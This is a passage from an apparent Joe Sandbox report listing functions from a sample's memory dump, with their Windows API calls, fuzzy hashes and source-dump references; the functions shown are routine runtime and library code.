Opcode Fuzzy Hash: 09269a717e6475dbcc3b2b6f15979d1dfc0f00f6ef3544c37ad900273fce02f5
Instruction Fuzzy Hash: 234136B0905B409EEB24EF798885AE6FBE5FF19310F54492ED5EEC3282CB316654CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0089B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0089B098

Part of subcall function 008813DC: __EH_prolog.LIBCMT ref: 008813E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3141a3a6f27b63fea9c98cd45e8b709a78300cd8e72c594b3f331e2f6daede53
Instruction ID: 4d833bacea639e693aa63534bcd8cd73df88babdf9e9dc403714a45aeff15654
Opcode Fuzzy Hash: 3141a3a6f27b63fea9c98cd45e8b709a78300cd8e72c594b3f331e2f6daede53
Instruction Fuzzy Hash: 11318A71800249EACF15EFA8D9519EEBBB8FF19304F14449AE409F3242DB35AE058B62

Uniqueness

Uniqueness Score: -1.00%

Function 008AAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,008B3A34), ref: 008AACF8

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0cba31536110b88c72d48250caf81d3f54aa64e654600f2610719b4cbc62a80e
Instruction ID: b9939f708dc3347890fd34d70bf9dcf5f52a003e2133ab4aa724d841b1bc40f7
Opcode Fuzzy Hash: 0cba31536110b88c72d48250caf81d3f54aa64e654600f2610719b4cbc62a80e
Instruction Fuzzy Hash: 6511A333A006296FBB3A9E2CEC449AA7395FB863747164220ED55EBE54DB34DC01C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00889215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0088921A

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 917cfff3723d2d63650f7e450f7b8825a90eeab92377c5511e9051752d169644
Instruction ID: 381004aa9ac06037743ef541c4a9ab6b0eb165db203c31a62be639fe0d6f4d66
Opcode Fuzzy Hash: 917cfff3723d2d63650f7e450f7b8825a90eeab92377c5511e9051752d169644
Instruction Fuzzy Hash: C2015233900528ABCF11BBACCC859EEB736FF88750B054625E866F7252DB348D0587A1

Uniqueness

Uniqueness Score: -1.00%

Function 008AC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 008AB136: RtlAllocateHeap.NTDLL(00000008,008B3A34,00000000,?,008A989A,00000001,00000364,?,?,?,0088D984,?,?,?,00000004,0088D710), ref: 008AB177

_free.LIBCMT ref: 008AC4E5

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: aadb5758a45ea9d5355617f579e8c0534d5a4709d0e09fafeba7a68a6f294ae8
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: F70126722043056BF3318E69888196AFBE8FB8A370F25051DE184C3681EA30A805C738

Uniqueness

Uniqueness Score: -1.00%

Function 008AB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,008B3A34,00000000,?,008A989A,00000001,00000364,?,?,?,0088D984,?,?,?,00000004,0088D710), ref: 008AB177

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d32c06a888da837e25e3a232769b5a2c0325e1a89760d4921af30f8e41c672ba
Instruction ID: f080c40e0588083ab87ae9a5aba92a1708fc8ac0b92144c9b8e6f7bd837a3542
Opcode Fuzzy Hash: d32c06a888da837e25e3a232769b5a2c0325e1a89760d4921af30f8e41c672ba
Instruction Fuzzy Hash: E7F08932505569B7FB255A65AC25B5F7748FF43770B188221FC08EB992CB30DD0186E1

Uniqueness

Uniqueness Score: -1.00%

Function 008A3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 008A3C3F

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 54e2bf5801ff78b56c50927d892ffb9deab014feb2e1292c5dca54aa9a9a276e
Instruction ID: d3dc49baef5e2500c1cd8ad1b54b6b5d947f8d4d780a2854b929c650b929547d
Opcode Fuzzy Hash: 54e2bf5801ff78b56c50927d892ffb9deab014feb2e1292c5dca54aa9a9a276e
Instruction Fuzzy Hash: AAF0E5322002169FEF119EACFC04A9A77A9FF12B307104125FA05E75D0DB31EA20C790

Uniqueness

Uniqueness Score: -1.00%

Function 008A8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4580757fef041af7d1e38a9aa1ef868e620baddfdfc975e75f525d677990a680
Instruction ID: c5275b10cb48f81d49b0b04d3e91ce1cffe79c1cab5d78621dce2a004ee0c468
Opcode Fuzzy Hash: 4580757fef041af7d1e38a9aa1ef868e620baddfdfc975e75f525d677990a680
Instruction Fuzzy Hash: 46E0E531206125D6FB7127259C04B5F7688FB433B4F110110AC59D6C91DF21CC2086F1

Uniqueness

Uniqueness Score: -1.00%

Function 00885ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00885AC2

Part of subcall function 0088B505: __EH_prolog.LIBCMT ref: 0088B50A

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f4bc071d32b6458643b8a5060aef8c474ae8246213d13f236f606c5a653f6034
Instruction ID: 095d01bd50c3009e3236e421d18f0d47c32afdc248125fef3eef89a0e0c65cf4
Opcode Fuzzy Hash: f4bc071d32b6458643b8a5060aef8c474ae8246213d13f236f606c5a653f6034
Instruction Fuzzy Hash: 31016930810790DEDB26F7ACC0417DDBBA4EF64304F58848DA456A3282DBB42B08DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00889620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,008895D6,?,?,?,?,?,008B2641,000000FF), ref: 0088963B

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 5bf64e4a65e8c885c35693ca190e259f37901f3e592996a943eba8ebe6649fdc
Instruction ID: 0f982b7a99942414d6557b1b12b0de133cc8c15ac7992f6388979eb4ac89b6fd
Opcode Fuzzy Hash: 5bf64e4a65e8c885c35693ca190e259f37901f3e592996a943eba8ebe6649fdc
Instruction Fuzzy Hash: 75F05470485B159EDB31EA64C458BA277E8FB22325F081B1ED0E7829E0E771658D8B40

Uniqueness

Uniqueness Score: -1.00%

Function 0088A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0088A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6C4
Part of subcall function 0088A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6F2
Part of subcall function 0088A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0088A598

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: b2aa1137eeb2db01b04d1eea683a761dd921a7daf718b128b68937a5ab4b7959
Instruction ID: c0df90654e161640dcf0b88db874755ed3abb0bc22161fbf2d66bc40f39aa8ce
Opcode Fuzzy Hash: b2aa1137eeb2db01b04d1eea683a761dd921a7daf718b128b68937a5ab4b7959
Instruction Fuzzy Hash: BAF05E31008790AADA6677B88904BDA7B90BF1A321F048A4AF1F9921D6C37551959B23

Uniqueness

Uniqueness Score: -1.00%

Function 00890E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00890E3D

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 7062559ef5d21689680f0731b3cb9cf5c134d26e3cd2215f2a49ab89ff7da1e9
Instruction ID: c26d2e23fb26321e0ac88dcc8bf9f7b54f77ba514b2f493ca5b7fdb2a05f5510
Opcode Fuzzy Hash: 7062559ef5d21689680f0731b3cb9cf5c134d26e3cd2215f2a49ab89ff7da1e9
Instruction Fuzzy Hash: DED012116150565ADE11332C695DBFE2617FFC7321F0D0065B145D7183DE644886A263

Uniqueness

Uniqueness Score: -1.00%

Function 0089A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0089A62C

Part of subcall function 0089A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0089A3DA

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 74cf48fc3cbe844a9f2f86d826d9f80cc145e806ea89f0b593ae91c7ac582a88
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: BCD0A93020020CBADF0ABB26CC0297E7ADAFB10740F088021B842E5281EBB1D910A2A3

Uniqueness

Uniqueness Score: -1.00%

Function 0089E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 0089E5E3

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 229f8ba0e5c227c79150a778433354647b812a82303060af56d20707320231fc
Instruction ID: 516fcd9414ad5856d14093f1fb9a5556c80b681b03ac4485082eba6ee009793f
Opcode Fuzzy Hash: 229f8ba0e5c227c79150a778433354647b812a82303060af56d20707320231fc
Instruction Fuzzy Hash: 2DD0C9B0580280ABDE02FBA8A88A7243B54F325B04FA80115F145D5595DA745480C606

Uniqueness

Uniqueness Score: -1.00%

Function 0089DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00891B3E), ref: 0089DD92

Part of subcall function 0089B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
Part of subcall function 0089B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
Part of subcall function 0089B568: IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
Part of subcall function 0089B568: TranslateMessage.USER32(?), ref: 0089B5AC
Part of subcall function 0089B568: DispatchMessageW.USER32(?), ref: 0089B5B6

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 1b70116bf4feb822781ee60fa6a6903b0c3d448550e9af0b4e84de7043c7820b
Instruction ID: 8d92ffec57a704d754361def787ecdea6b5f4dd3c7e41d69f3afdc39585ea5a0
Opcode Fuzzy Hash: 1b70116bf4feb822781ee60fa6a6903b0c3d448550e9af0b4e84de7043c7820b
Instruction Fuzzy Hash: C8D09E31144300BADA023B55DE06F1A7AA2FB88B09F004555B284750B186729E21DF16

Uniqueness

Uniqueness Score: -1.00%

Function 008898BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,008897BE), ref: 008898C8

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: c52baa38ebc448b495506d90b5055b3befc0911f6a64f4b7a33a58dcb5b93030
Instruction ID: 613c5892cba69103428a40fb54a1b02e92132dde6d1fd51a7ab60b92a13b6774
Opcode Fuzzy Hash: c52baa38ebc448b495506d90b5055b3befc0911f6a64f4b7a33a58dcb5b93030
Instruction Fuzzy Hash: 28C00234404506958E61662598450A57711FF533697B897A4D0A9C54A1C322CC57EB11

Uniqueness

Uniqueness Score: -1.00%

Function 0089E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b4aa264b45442a09e63a82c3efce034e23040230971d0489e7b967842bb9a871
Instruction ID: 0328fec931a53dd369c32157e3ef6250ac7b1e3e31dfff353aa64adfbdab3470
Opcode Fuzzy Hash: b4aa264b45442a09e63a82c3efce034e23040230971d0489e7b967842bb9a871
Instruction Fuzzy Hash: D7B012D5268145BC3504B1CA1C07C37150CF0C2B11334843EFC71D4980DC40AD840432

Uniqueness

Uniqueness Score: -1.00%

Function 0089E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fefb01313ed6039e0c6953c7d92f370bf50b73ce99506fa2bb1993705ef08866
Instruction ID: a8cc8105fdde27deae9b84eca1ef4e3df16841f1c0a8068377832e4473f5ce45
Opcode Fuzzy Hash: fefb01313ed6039e0c6953c7d92f370bf50b73ce99506fa2bb1993705ef08866
Instruction Fuzzy Hash: C8B012D526C149EC3504F1CE1C07D37150CF0C1B11334407EF875C5680DC406D840532

Uniqueness

Uniqueness Score: -1.00%

Function 0089E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E1E3

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
